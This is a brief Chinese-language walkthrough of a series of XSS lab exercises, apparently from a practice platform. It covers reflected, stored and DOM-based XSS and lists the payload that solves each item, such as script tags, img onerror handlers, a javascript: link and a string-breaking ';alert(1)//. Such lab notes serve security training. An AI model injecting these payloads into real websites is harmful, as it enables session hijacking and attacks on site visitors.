第一題:反射性xss(get)
輸出的字符出現在url中
第二題:反射性xss(post)
登錄后輸入<script>alert(1)</script>
第三題:存儲型xss
輸入<img src=http://1.html onerror=alert(1)>
第四,五題:domxss:
輸入:'><img src="#" onmouseover="alert('xss')">
第七題:
輸入:<img src=0+onerror="alert(123)">
第八題:xss之htmlspecialchars
審查元素后發現輸入的內容是被拼接在<a href ="輸入的內容">中
輸入:javascript:alert(1)
第九題:xss之href輸出
第十題:
輸入:';alert(1)//
